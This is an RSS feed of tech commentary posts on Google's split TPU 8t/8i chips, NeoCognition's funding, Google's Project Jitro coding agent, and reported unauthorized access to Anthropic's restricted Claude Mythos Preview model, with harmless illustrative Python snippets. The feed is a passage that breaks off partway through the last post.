<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Security Forem: Om Shree</title>
    <description>The latest articles on Security Forem by Om Shree (@om_shree_0709).</description>
    <link>https://zeroday.forem.com/om_shree_0709</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2900392%2F78ad1723-16ab-4e46-b39c-7f3feb416d23.jpg</url>
      <title>Security Forem: Om Shree</title>
      <link>https://zeroday.forem.com/om_shree_0709</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://zeroday.forem.com/feed/om_shree_0709"/>
    <language>en</language>
    <item>
      <title>Google Just Split Its TPU Into Two Chips. Here's What That Actually Signals About the Agentic Era.</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Thu, 23 Apr 2026 03:47:11 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/google-just-split-its-tpu-into-two-chips-heres-what-that-actually-signals-about-the-agentic-era-2485</link>
      <guid>https://zeroday.forem.com/om_shree_0709/google-just-split-its-tpu-into-two-chips-heres-what-that-actually-signals-about-the-agentic-era-2485</guid>
      <description>&lt;p&gt;Training and inference have always had different physics. Google just decided to stop pretending one chip could handle both.&lt;/p&gt;

&lt;p&gt;At &lt;a href="https://cloud.google.com/blog/products/compute/ai-infrastructure-at-next26" rel="noopener noreferrer"&gt;Google Cloud Next '26&lt;/a&gt; on April 22, Google announced the eighth generation of its Tensor Processing Units — but for the first time in TPU history, that generation isn't a single chip. It's two: the &lt;strong&gt;TPU 8t&lt;/strong&gt; for training, and the &lt;strong&gt;TPU 8i&lt;/strong&gt; for inference and agentic workloads. That architectural split is the most meaningful signal in this announcement, and most coverage has buried it.&lt;/p&gt;

&lt;h2&gt;The Problem It's Solving&lt;/h2&gt;

&lt;p&gt;Standard RAG retrieves. Agents reason, plan, execute, and loop back. That distinction matters enormously at the infrastructure level.&lt;/p&gt;

&lt;p&gt;Chat-based AI inference has a relatively forgiving latency budget. A user submits a prompt, waits a second or two, reads the response. Agentic workflows don't work that way. A primary agent decomposes a goal into subtasks, dispatches specialized agents, collects results, evaluates them, and decides what to do next — all in real time, potentially across thousands of concurrent sessions. The per-step latency compounds. If your inference chip is optimized for throughput over latency (which it was, because that's what training needs), you end up with agent loops that are sluggish, expensive, and hard to scale.&lt;/p&gt;
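&lt;p&gt;A quick back-of-the-envelope sketch makes the compounding concrete. All numbers below are illustrative assumptions, not published figures:&lt;/p&gt;

```python
# Illustrative only: how per-step inference latency compounds in an agent loop.
# Every number here is a hypothetical assumption for the sake of arithmetic.

def agent_task_latency(steps, per_step_s):
    """Total wall-clock time for one agent task that runs `steps`
    sequential reason/act/observe iterations."""
    return steps * per_step_s

# A chat turn: one model call at ~2 s feels fine to a waiting user.
chat = agent_task_latency(steps=1, per_step_s=2.0)

# An agent decomposing a goal into 20 sequential sub-steps at the
# same 2 s per call is now a 40 s task...
agent_slow = agent_task_latency(steps=20, per_step_s=2.0)

# ...while cutting per-step latency to 0.4 s brings it back to 8 s.
agent_fast = agent_task_latency(steps=20, per_step_s=0.4)

print(chat, agent_slow, agent_fast)  # 2.0 40.0 8.0
```

&lt;p&gt;Multiply that by thousands of concurrent sessions and per-step latency, not raw throughput, becomes the cost driver.&lt;/p&gt;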

&lt;p&gt;Previous TPU generations, including last year's &lt;a href="https://cloud.google.com/tpu" rel="noopener noreferrer"&gt;Ironwood&lt;/a&gt;, were pitched as unified flagship chips. Google's internal experience running Gemini, its consumer AI products, and increasingly complex agent workloads apparently showed that a single architecture forces uncomfortable trade-offs. So they split the roadmap.&lt;/p&gt;

&lt;h2&gt;How the TPU 8t and TPU 8i Actually Work&lt;/h2&gt;

&lt;p&gt;The &lt;strong&gt;TPU 8t&lt;/strong&gt; is the training powerhouse. It packs 9,600 chips in a single superpod to provide 121 exaflops of compute and two petabytes of shared memory connected through high-speed inter-chip interconnects. That's roughly 3x higher compute performance than the previous generation, with doubled inter-chip interconnect bandwidth to ensure that massive models hit near-linear scaling. At the cluster level, Google can now connect more than one million TPUs across multiple data center sites into a training cluster — essentially transforming globally distributed infrastructure into one seamless supercomputer.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;TPU 8i&lt;/strong&gt; is the more architecturally interesting chip. With 3x more on-chip SRAM than the previous generation, TPU 8i can host a larger KV cache entirely on silicon, significantly reducing core idle time during long-context decoding. The key innovation is a component called the &lt;strong&gt;Collectives Acceleration Engine (CAE)&lt;/strong&gt; — a dedicated unit that aggregates results across cores with near-zero latency, specifically accelerating the reduction and synchronization steps required during autoregressive decoding and chain-of-thought processing. The result: on-chip collective latency drops by 5x.&lt;/p&gt;
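&lt;p&gt;To see why on-chip KV cache capacity matters, here is a rough sizing sketch using the standard KV-cache formula. The model dimensions are hypothetical examples, not the specs of any particular model:&lt;/p&gt;

```python
# Rough KV-cache sizing: why long-context decoding is a memory problem.
# The model dimensions below are invented for illustration.

def kv_cache_bytes(layers, kv_heads, head_dim, seq_len, bytes_per_value=2):
    # 2x for keys and values; bf16/fp16 stores 2 bytes per value.
    return 2 * layers * kv_heads * head_dim * seq_len * bytes_per_value

# A mid-sized model: 32 layers, 8 KV heads (grouped-query attention),
# head_dim 128, decoding against a 128K-token context.
per_token = kv_cache_bytes(32, 8, 128, 1)      # bytes appended per decoded token
full_ctx = kv_cache_bytes(32, 8, 128, 131072)  # whole 128K context resident

print(per_token, full_ctx / 2**30)  # 131072 16.0 (bytes/token, GiB total)
```

&lt;p&gt;A cache of that size has historically lived in HBM; every byte the chip can keep in SRAM instead is a byte the cores don't stall waiting for.&lt;/p&gt;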

&lt;p&gt;Google also redesigned the inter-chip network topology specifically for 8i. The previous 3D torus topology prioritized bandwidth. For 8i, Google changed how chips connect together using fully connected boards aggregated into groups — a high-radix design called Boardfly that connects up to 1,152 chips together, reducing the network diameter and the number of hops a data packet must take to cross the system, achieving up to a 50% improvement in latency for communication-intensive workloads.&lt;/p&gt;
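&lt;p&gt;A simplified hop-count comparison shows why topology matters here. The two-level model below is an illustrative assumption about fully connected boards joined into fully connected groups, not Google's published Boardfly specification:&lt;/p&gt;

```python
# Worst-case hop count (network diameter): 3D torus vs. a two-level
# fully connected design. The two-level model is an illustrative
# assumption, not the actual Boardfly spec.

def torus_3d_diameter(n):
    """Worst-case hops in an n x n x n torus with wraparound links:
    at most floor(n/2) hops in each of the three dimensions."""
    return 3 * (n // 2)

def two_level_diameter():
    """Fully connected boards joined into fully connected groups:
    worst case is roughly board-exit, group hop, board-entry."""
    return 3

n = 10                             # a 10 x 10 x 10 torus, ~1,000 chips
torus_hops = torus_3d_diameter(n)  # 15 hops worst case
flat_hops = two_level_diameter()   # 3 hops, independent of scale
print(torus_hops, flat_hops)
```

&lt;p&gt;Fewer worst-case hops is exactly what all-to-all collective operations, the hot path in agentic decoding, care about.&lt;/p&gt;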

&lt;p&gt;In raw spec terms, the 8i delivers 9.8x the FP8 exaFLOPS per pod, 6.8x the HBM capacity per pod, and a pod size that grows 4.5x, from 256 to 1,152 chips, compared to the prior generation.&lt;/p&gt;
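&lt;p&gt;Because the pod itself grew 4.5x, the per-chip gains are smaller than the per-pod headlines suggest. The pod-level multipliers below are the announced figures; the per-chip numbers are simple derivations from them:&lt;/p&gt;

```python
# Separating per-pod gains from per-chip gains. Pod-level multipliers are
# the announced figures; per-chip figures are derived by dividing out the
# pod-size growth.

pod_fp8_gain = 9.8          # FP8 compute per pod vs. prior generation
pod_hbm_gain = 6.8          # HBM capacity per pod vs. prior generation
pod_size_gain = 1152 / 256  # chips per pod: 4.5x

per_chip_fp8 = pod_fp8_gain / pod_size_gain  # ~2.2x per chip
per_chip_hbm = pod_hbm_gain / pod_size_gain  # ~1.5x per chip

print(round(pod_size_gain, 2), round(per_chip_fp8, 2), round(per_chip_hbm, 2))
# 4.5 2.18 1.51
```

&lt;p&gt;In other words, most of the headline gain comes from scaling the pod out, not from each chip getting an order of magnitude faster.&lt;/p&gt;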

&lt;p&gt;The economic headline: TPU 8i delivers 80% better performance per dollar for inference than the prior generation.&lt;/p&gt;

&lt;h2&gt;What Teams Are Actually Using This For&lt;/h2&gt;

&lt;p&gt;The split architecture is most directly useful for three categories of workload.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Frontier model training&lt;/strong&gt; at labs and large enterprises. TPU 8t was designed in partnership with Google DeepMind and is built to efficiently train world models like DeepMind's Genie 3, enabling millions of agents to practice and refine their reasoning in diverse simulated environments. If you're training large proprietary models, the 8t's near-linear scaling at million-chip clusters changes the economics of when you can afford to retrain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;High-concurrency agentic inference&lt;/strong&gt; is where the 8i shines. Multi-agent pipelines, MoE model serving, chain-of-thought reasoning loops — all of these hammer the all-to-all communication patterns that the Boardfly topology specifically addresses. The implication is lower latency per agent step at scale, which compounds significantly when you're running thousands of parallel agent sessions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reinforcement learning post-training&lt;/strong&gt; sits between the two. Google's new Axion-powered N4A CPU instances handle the complex logic, tool calls, and feedback loops surrounding the core AI model — offering up to 30% better price-performance for comparable agent workloads than other hyperscalers. The intended stack is TPU 8t for pre-training, TPU 8i for RL and inference, and Axion for orchestration logic.&lt;/p&gt;

&lt;p&gt;Google is also wrapping all of this in upgraded networking. The Virgo Network's collapsed fabric architecture offers 4x the bandwidth of previous generations and can connect 134,000 TPUs into a single fabric in a single data center. Storage got overhauled too: Google Cloud Managed Lustre now delivers 10 TB/s of bandwidth — a 10x improvement over last year — with sub-millisecond latency via TPUDirect and RDMA, allowing data to bypass the host and move directly to the accelerators.&lt;/p&gt;

&lt;h2&gt;Why This Is a Bigger Deal Than It Looks&lt;/h2&gt;

&lt;p&gt;The obvious read on this announcement is "Google vs. Nvidia." That framing is mostly wrong, and Google itself isn't pretending otherwise. Google promises its cloud will have Nvidia's latest chip, Vera Rubin, available later this year, and the two companies are co-engineering the open-source Falcon networking protocol via the Open Compute Project. This is not a replacement strategy — it's a portfolio strategy.&lt;/p&gt;

&lt;p&gt;The more important signal is what the architectural split says about where the AI workload is going. Seven generations of TPUs were built on the assumption that training and inference are different phases of the same pipeline — you train, then you serve. The 8t/8i split encodes a different belief: that agentic inference is so architecturally distinct from training that the two require fundamentally different silicon. That's a bet on the permanence of agentic workflows, not just a current optimization.&lt;/p&gt;

&lt;p&gt;For enterprise buyers, the TPU v8 reframes the 2026–2027 cloud evaluation in concrete ways: teams training large proprietary models should look at 8t availability windows and Virgo networking access. Teams serving agents or reasoning workloads should evaluate 8i on Vertex AI and whether HBM-per-pod sizing fits their context windows.&lt;/p&gt;

&lt;p&gt;There's also a vertical integration argument here that's easy to underestimate. Google co-designs its chips with DeepMind, runs them on its own networking fabric, manages its own storage layer, and orchestrates everything through GKE. Native PyTorch support for TPU — TorchTPU — is now in preview with select customers, allowing models to run on TPUs as-is with full support for native PyTorch Eager Mode. That removes one of the biggest friction points developers have historically had with TPUs: you no longer need to rewrite your training code to access Google's silicon. Combined with vLLM support on TPU, the migration path from an Nvidia-based setup is shorter than it's ever been.&lt;/p&gt;

&lt;h2&gt;Availability and Access&lt;/h2&gt;

&lt;p&gt;TPU 8t and TPU 8i will be available to Cloud customers later in 2026. You can request more information now to prepare for their general availability. The chips are integrated into Google's &lt;a href="https://cloud.google.com/solutions/ai-hypercomputer" rel="noopener noreferrer"&gt;AI Hypercomputer&lt;/a&gt; stack, supporting JAX, PyTorch, vLLM, and XLA. Deployment options range from &lt;a href="https://cloud.google.com/vertex-ai" rel="noopener noreferrer"&gt;Vertex AI&lt;/a&gt; managed services to &lt;a href="https://cloud.google.com/kubernetes-engine" rel="noopener noreferrer"&gt;GKE&lt;/a&gt; for teams that want infrastructure-level control.&lt;/p&gt;

&lt;p&gt;The honest caveat: these are self-reported benchmarks against Google's own prior generation. Independent third-party numbers from cloud customers and evaluators will emerge over the next two quarters, and those will be the numbers that actually matter for procurement decisions.&lt;/p&gt;

&lt;p&gt;The split TPU roadmap isn't just a chip announcement — it's Google encoding its architectural thesis about what AI infrastructure looks like in an agentic world directly into silicon. Every other hyperscaler is going to have to answer the same question: do you build one chip to do everything, or do you specialize?&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Follow for more coverage on MCP, agentic AI, and AI infrastructure.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>discuss</category>
      <category>cloud</category>
      <category>google</category>
    </item>
    <item>
      <title>NeoCognition Just Raised $40M to Fix the One Thing Every AI Agent Gets Wrong</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Thu, 23 Apr 2026 03:34:27 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/neocognition-just-raised-40m-to-fix-the-one-thing-every-ai-agent-gets-wrong-i1n</link>
      <guid>https://zeroday.forem.com/om_shree_0709/neocognition-just-raised-40m-to-fix-the-one-thing-every-ai-agent-gets-wrong-i1n</guid>
      <description>&lt;p&gt;Every AI agent demo looks impressive until you actually depend on one. That 50% task completion rate you've quietly accepted as "normal"? &lt;a href="https://techcrunch.com/2026/04/21/ai-research-lab-neocognition-lands-40m-seed-to-build-agents-that-learn-like-humans/" rel="noopener noreferrer"&gt;NeoCognition&lt;/a&gt; just called it out directly, and raised $40 million to do something about it.&lt;/p&gt;

&lt;h2&gt;The Problem It's Solving&lt;/h2&gt;

&lt;p&gt;The foundational critique that NeoCognition is building on is blunt: current agents — whether Claude Code, OpenClaw, or Perplexity's computer tools — successfully complete tasks as intended only about 50% of the time. That is not a UX problem or a prompt engineering problem. It's a structural one. Today's agents are stateless generalists. They bring no accumulated knowledge of your environment, your workflows, or your domain's specific constraints to each task. Every time you invoke one, it's starting from scratch.&lt;/p&gt;

&lt;p&gt;The standard industry response to this has been fine-tuning — custom-engineering an agent for a specific vertical and hoping it holds. That works until the domain shifts, the tooling changes, or you need to deploy the same agent somewhere new. Then you're back to zero.&lt;/p&gt;

&lt;h2&gt;How NeoCognition Actually Works&lt;/h2&gt;

&lt;p&gt;NeoCognition was started by Yu Su, Xiang Deng, and Yu Gu, who all worked together in Su's AI agent lab at Ohio State University. Su's team began developing LLM-based agents before the ChatGPT moment, and their research — including Mind2Web and MMMU — is now used by OpenAI, Anthropic, and Google. This is not a product team that pivoted into agents. It's the research behind the agents you're already using, now building something opinionated about what those agents got wrong.&lt;/p&gt;

&lt;p&gt;The core thesis is drawn from how humans actually acquire expertise. NeoCognition's agents continuously learn the structure, workflows, and constraints of the environments they operate in, and specialize into domain experts by learning a world model of work. The phrase "world model" is doing significant work here. Rather than applying general reasoning to every task, these agents are designed to build an internal map of a specific micro-environment — its rules, its dependencies, its edge cases — and continuously refine that map through experience.&lt;/p&gt;

&lt;p&gt;The Palo Alto startup argues that its agents learn on the job as specialists rather than relying on fixed general training, which is the architectural distinction that matters. Fixed training is a snapshot. A world model grows.&lt;/p&gt;

&lt;h2&gt;What Enterprises Are Actually Using It For&lt;/h2&gt;

&lt;p&gt;NeoCognition's primary target is the enterprise market, and specifically the SaaS layer. It intends to sell its agent systems to enterprises, including established SaaS companies, which can use them to build agent workers or to enhance existing product offerings. The framing here is interesting: they're not just selling agents to enterprises, they're selling the infrastructure for SaaS companies to make their own products agentic.&lt;/p&gt;

&lt;p&gt;The Vista Equity Partners participation is strategic, not just financial. As one of the largest private equity firms in the software space, Vista can provide NeoCognition with direct access to a vast portfolio of companies looking to modernize their products with AI. That's a go-to-market lever, not just a check. You don't close Vista for the cap table optics — you close them because they own the distribution you need.&lt;/p&gt;

&lt;p&gt;The deeper implication for enterprises is the safety argument. Deeper understanding of their environments enables NeoCognition's agents to be more responsible and safer actors in high-stakes settings. An agent that understands why a workflow exists — not just what the workflow is — is less likely to take a technically correct action that's contextually wrong. That's the difference between a tool and a trusted system.&lt;/p&gt;

&lt;h2&gt;Why This Is a Bigger Deal Than It Looks&lt;/h2&gt;

&lt;p&gt;The investor list deserves more attention than most coverage is giving it. Angel investors and founding advisors include Lip-Bu Tan, CEO of Intel, Ion Stoica, co-founder and executive chairman of Databricks, and leading AI researchers like Dawn Song, Ruslan Salakhutdinov, and Luke Zettlemoyer. Those last three — Song, Salakhutdinov, and Zettlemoyer — are foundational researchers in modern deep learning and NLP. When researchers of that caliber put their names on a company, they're endorsing the technical thesis, not just the team.&lt;/p&gt;

&lt;p&gt;The timing reflects a broader pattern in AI investment in 2026: capital is increasingly flowing not towards frontier model development — dominated by a small number of well-capitalized labs — but towards the infrastructure and agent layer above it. The model wars are effectively over for now. The next real competition is in what those models can reliably &lt;em&gt;do&lt;/em&gt;, and that's an infrastructure and learning problem, not a parameter-count problem.&lt;/p&gt;

&lt;p&gt;What NeoCognition is proposing — agents that build structured world models of their operating environments — is also the missing architectural primitive for MCP-based agent pipelines. Right now, most agentic systems using MCP are still stateless: each tool call happens in context, but the agent isn't &lt;em&gt;learning&lt;/em&gt; the tool ecosystem it operates in. An agent layer that builds persistent, structured knowledge of its environment and the tools available to it would meaningfully change what's achievable in production agentic workflows.&lt;/p&gt;
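&lt;p&gt;A minimal sketch of that missing primitive, with purely invented names and structure: an agent-side store that accumulates observations about each tool across sessions, so the next invocation starts with a briefing instead of a blank slate.&lt;/p&gt;

```python
# Hypothetical illustration of persistent tool knowledge for an agent.
# Class names, fields, and example observations are all invented; this is
# not NeoCognition's architecture or any real MCP feature.

import json

class ToolMemory:
    """Persists what the agent has learned about each tool across sessions."""

    def __init__(self):
        self.notes = {}   # maps each tool name to accumulated observations

    def record(self, tool, observation):
        self.notes.setdefault(tool, []).append(observation)

    def briefing(self, tool):
        """What a future invocation should know before calling this tool."""
        return self.notes.get(tool, [])

    def save(self, path):
        # Persist across sessions; a real system would use a database.
        with open(path, "w") as f:
            json.dump(self.notes, f)

memory = ToolMemory()
memory.record("search_tickets", "rate-limited above 5 req/s")
memory.record("search_tickets", "ids are strings, not ints")
print(memory.briefing("search_tickets"))
```

&lt;p&gt;The point of the sketch is the shape, not the code: the knowledge lives with the agent layer and survives between tasks, which is precisely what stateless MCP pipelines lack today.&lt;/p&gt;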

&lt;h2&gt;Availability and Access&lt;/h2&gt;

&lt;p&gt;NeoCognition has just emerged from stealth, so there's no public product available yet. The company currently has about 15 employees, the majority of whom hold PhDs. This is explicitly still a research-to-product transition — the $40M is funding that transition. Enterprise access will likely come through direct partnership channels, given the Vista relationship and the SaaS-first go-to-market. Developers wanting to follow the research can track Su's prior work through his &lt;a href="https://ysu1989.github.io/" rel="noopener noreferrer"&gt;Ohio State lab page&lt;/a&gt;.&lt;/p&gt;




&lt;p&gt;The 50% reliability ceiling on current agents isn't a model problem — it's a memory and specialization problem. NeoCognition is making a structural bet that the next unlock in agent reliability isn't more parameters; it's agents that actually learn where they're deployed. If they're right, the companies building on today's stateless agent architectures are building on borrowed time.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Follow for more coverage on MCP, agentic AI, and AI infrastructure.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>machinelearning</category>
      <category>agents</category>
      <category>discuss</category>
    </item>
    <item>
      <title>Google's Project Jitro Just Redefined What a Coding Agent Is. Here's What It Actually Changes.</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Wed, 22 Apr 2026 03:35:56 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/googles-project-jitro-just-redefined-what-a-coding-agent-is-heres-what-it-actually-changes-4oc3</link>
      <guid>https://zeroday.forem.com/om_shree_0709/googles-project-jitro-just-redefined-what-a-coding-agent-is-heres-what-it-actually-changes-4oc3</guid>
      <description>&lt;p&gt;Project Jules used to tell your AI what to do. Jitro tells it what you want. That gap — between task execution and outcome ownership — is the entire bet Google is making with its next-generation coding agent.&lt;/p&gt;

&lt;h2&gt;The Problem With Every Coding Agent Right Now&lt;/h2&gt;

&lt;p&gt;Every major AI coding tool today, whether it's &lt;a href="https://github.com/features/copilot" rel="noopener noreferrer"&gt;GitHub Copilot&lt;/a&gt;, &lt;a href="https://cursor.sh/" rel="noopener noreferrer"&gt;Cursor&lt;/a&gt;, &lt;a href="https://codeium.com/windsurf" rel="noopener noreferrer"&gt;Windsurf&lt;/a&gt;, or &lt;a href="https://openai.com/codex" rel="noopener noreferrer"&gt;OpenAI's Codex&lt;/a&gt;, operates on the same underlying model: you define the work, the agent does it. You write the prompt, you review the output, you write the next prompt. The developer is still the scheduler, the project manager, and the QA team. The AI is a very fast, very capable executor.&lt;/p&gt;

&lt;p&gt;That's genuinely useful. But it hits a ceiling. When your goal is "reduce memory leaks in the backend by 20%" or "get our accessibility score to 100%," you don't want to translate that into ten sequential prompts across a week. You want to hand it off. No current tool actually lets you do that.&lt;/p&gt;

&lt;h2&gt;How Project Jitro Actually Works&lt;/h2&gt;

&lt;p&gt;Google is internally developing Project Jitro as an autonomous AI system that moves beyond prompt-based coding to independently execute high-level development goals. It's built on &lt;a href="https://jules.google/" rel="noopener noreferrer"&gt;Jules&lt;/a&gt;, Google's existing asynchronous coding agent — but the architecture is meaningfully different.&lt;/p&gt;

&lt;p&gt;Rather than asking developers to manually instruct an agent on what to build or fix, Jitro (in effect, Jules V2) appears designed around high-level goal-setting: KPI-driven development, where the agent autonomously identifies what needs to change in a codebase to move a metric in the right direction.&lt;/p&gt;

&lt;p&gt;The workspace model is the critical piece. A dedicated workspace for the agent suggests Google envisions Jitro as a persistent collaborator rather than a one-shot tool. Early signals point to a workspace where developers can list goals, track insights, and configure tool integrations — a layer of continuity that current coding agents don't offer.&lt;/p&gt;

&lt;p&gt;From leaked tooling definitions, the Jitro workspace API exposes operations like: list goals, create a goal after helping articulate it clearly, list insights, get update history for an insight, and list configured tool integrations including MCP remote servers and API connections. That last item is significant — Jitro integrates through Model Context Protocol (MCP) remote servers and various API connections to ensure it has the context it needs.&lt;/p&gt;
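&lt;p&gt;For illustration only, here is one way such a workspace surface could be shaped, based purely on the operation names described above. Every class name, method signature, and type here is invented; none of this is a real Google API.&lt;/p&gt;

```python
# Hypothetical sketch of a goal-oriented workspace surface. Names and
# signatures are invented for illustration and do not reflect any real
# Jitro or Google API.

from dataclasses import dataclass, field

@dataclass
class Goal:
    title: str   # e.g. "reduce backend memory leaks by 20%"
    metric: str  # the KPI the agent is expected to move

@dataclass
class Workspace:
    goals: list = field(default_factory=list)
    insights: dict = field(default_factory=dict)      # insight id to update history
    integrations: list = field(default_factory=list)  # MCP servers, API connections

    def create_goal(self, title, metric):
        goal = Goal(title, metric)
        self.goals.append(goal)
        return goal

    def list_goals(self):
        return list(self.goals)

    def insight_history(self, insight_id):
        return self.insights.get(insight_id, [])

    def list_integrations(self):
        return list(self.integrations)

ws = Workspace(integrations=["mcp://ci-server", "issue-tracker-api"])
ws.create_goal("Get accessibility score to 100%", metric="lighthouse_a11y")
print([g.title for g in ws.list_goals()])
```

&lt;p&gt;The notable design choice implied by the leak is that goals, insights, and integrations are first-class objects the agent reads and writes, rather than context stuffed into a prompt.&lt;/p&gt;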

&lt;p&gt;Transparency is baked in by design. When you set a goal in the Jitro workspace, the AI doesn't just operate silently — it surfaces its reasoning process, explaining why it chose a specific library or restructured a database table. You stay in control by approving the general direction, while the AI handles the execution.&lt;/p&gt;

&lt;h2&gt;What Engineering Teams Are Actually Going to Use This For&lt;/h2&gt;

&lt;p&gt;The use cases where this model genuinely wins are the ones that are currently painful in proportion to their importance: reducing error rates becomes the objective instead of debugging individual functions; improving test coverage becomes the target instead of writing test cases manually across multiple files; increasing conversions becomes the priority instead of adjusting isolated page elements without strategy alignment.&lt;/p&gt;

&lt;p&gt;The primary beneficiaries would be engineering teams managing large codebases where incremental improvements compound — performance optimization, test coverage, accessibility compliance.&lt;/p&gt;

&lt;p&gt;Jules V1 already demonstrated that the asynchronous model works. During the beta, thousands of developers tackled tens of thousands of tasks, resulting in over 140,000 code improvements shared publicly. Jules is now out of beta and available across free and paid tiers, integrated into Google AI Pro and Ultra subscriptions. Jitro inherits that async foundation and extends it to goals that span sessions, not just tasks.&lt;/p&gt;

&lt;h2&gt;Why This Is a Bigger Deal Than It Looks&lt;/h2&gt;

&lt;p&gt;The shift from prompt-driven to goal-driven AI isn't a UX improvement — it's a change in the unit of work. Right now, developer productivity is measured by how good your prompts are. Jitro changes that to how clearly you can define outcomes.&lt;/p&gt;

&lt;p&gt;Routine tasks like debugging, writing boilerplate code, or running tests may increasingly be handled by AI systems. As a result, developers may shift toward higher-level responsibilities — guiding AI systems, reviewing outputs, and aligning technical work with business goals.&lt;/p&gt;

&lt;p&gt;This marks a departure from the task-level paradigm seen across competitors like GitHub Copilot, Cursor, and even OpenAI's Codex agent, all of which still rely on developers defining specific work items. If Jitro ships as described, it resets what the category baseline looks like. Every competitor will be asked why their tool still needs a prompt for every action.&lt;/p&gt;

&lt;p&gt;The MCP integration angle is also worth watching closely. A goal-oriented coding agent that natively connects to MCP remote servers can reach across your entire toolchain — CI/CD, monitoring, issue trackers — rather than reasoning only over local files. That's a different class of tool.&lt;/p&gt;

&lt;p&gt;The honest caveat: the risk is that autonomous goal-pursuing agents introduce unpredictable changes, and trust will be the key barrier to adoption. None of the UI is visible yet, so the full scope remains unclear. There's a real question about what "approve the direction" actually looks like in practice when the agent is making dozens of decisions across a large codebase.&lt;/p&gt;

&lt;h2&gt;Availability and Access&lt;/h2&gt;

&lt;p&gt;Project Jitro is still pre-launch. The upcoming experience is expected to launch under a waitlist, with Google I/O 2026 on May 19 as the likely announcement moment alongside broader Gemini ecosystem updates. The Jules team has published a waitlist page with messaging that reads: "Manually prompting your agents is so… 2025."&lt;/p&gt;

&lt;p&gt;Current &lt;a href="https://jules.google/" rel="noopener noreferrer"&gt;Jules&lt;/a&gt; users on Google AI Pro and Ultra are the most likely early access recipients. No public timeline beyond "2026" has been confirmed.&lt;/p&gt;




&lt;p&gt;The line between "AI that helps you code" and "AI that owns a development objective" is the line Jitro is trying to cross. Whether it lands or not at I/O, the framing alone forces every other coding tool to answer the same question: how long until your users stop writing prompts?&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Follow for more coverage on MCP, agentic AI, and AI infrastructure.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>programming</category>
      <category>discuss</category>
    </item>
    <item>
      <title>Anthropic's Most Dangerous Model Just Got Accessed by People Who Weren't Supposed to Have It</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Wed, 22 Apr 2026 01:28:17 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/anthropics-most-dangerous-model-just-got-accessed-by-people-who-werent-supposed-to-have-it-14dn</link>
      <guid>https://zeroday.forem.com/om_shree_0709/anthropics-most-dangerous-model-just-got-accessed-by-people-who-werent-supposed-to-have-it-14dn</guid>
      <description>&lt;p&gt;Anthropic built a model so dangerous they refused to release it publicly. Then a Discord group got in anyway.&lt;/p&gt;

&lt;h2&gt;The Model They Wouldn't Ship&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://www.anthropic.com/project/glasswing" rel="noopener noreferrer"&gt;Claude Mythos Preview&lt;/a&gt; is Anthropic's most capable model to date for coding and agentic tasks. &lt;a href="https://www.anthropic.com/project/glasswing" rel="noopener noreferrer"&gt;Anthropic&lt;/a&gt; But it was never meant to reach the public. During testing, Mythos improved to the point where it mostly saturated existing cybersecurity benchmarks, prompting Anthropic to shift focus to novel real-world security tasks — specifically zero-day vulnerabilities, bugs that were not previously known to exist. &lt;a href="https://red.anthropic.com/2026/mythos-preview/" rel="noopener noreferrer"&gt;Anthropic&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;What they found was stark. Mythos Preview had already identified thousands of zero-day vulnerabilities — many of them rated critical — across critical infrastructure, every major operating system, and every major web browser (&lt;a href="https://www.anthropic.com/glasswing" rel="noopener noreferrer"&gt;Anthropic&lt;/a&gt;). In one documented case, Mythos fully autonomously identified and exploited a 17-year-old remote code execution vulnerability in FreeBSD that allows anyone to gain root on a machine running NFS. No human was involved in either the discovery or exploitation of this vulnerability after the initial request to find the bug (&lt;a href="https://red.anthropic.com/2026/mythos-preview/" rel="noopener noreferrer"&gt;Anthropic&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;This is why the model never went public.&lt;/p&gt;

&lt;h2&gt;Project Glasswing: The Controlled Release&lt;/h2&gt;

&lt;p&gt;Announced on April 7, Mythos was deployed as part of Anthropic's "Project Glasswing," a controlled initiative under which select organizations are permitted to use the unreleased Claude Mythos Preview model for defensive cybersecurity (&lt;a href="https://www.yahoo.com/news/articles/anthropics-mythos-model-accessed-unauthorized-214920132.html" rel="noopener noreferrer"&gt;Yahoo!&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Launch partners included Amazon Web Services, Anthropic, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorganChase, the Linux Foundation, Microsoft, NVIDIA, and Palo Alto Networks. Access was also extended to over 40 additional organizations that build or maintain critical software infrastructure (&lt;a href="https://www.anthropic.com/project/glasswing" rel="noopener noreferrer"&gt;Anthropic&lt;/a&gt;). The logic was clear: get defenders ahead of the curve before the capabilities proliferate to actors who won't use them carefully.&lt;/p&gt;

&lt;p&gt;Claude Mythos Preview is available to Project Glasswing participants at $25/$125 per million input/output tokens, accessible via the Claude API, Amazon Bedrock, Google Cloud's Vertex AI, and Microsoft Foundry. Anthropic committed $100M in model usage credits to cover Project Glasswing throughout the research preview (&lt;a href="https://www.anthropic.com/project/glasswing" rel="noopener noreferrer"&gt;Anthropic&lt;/a&gt;).&lt;/p&gt;
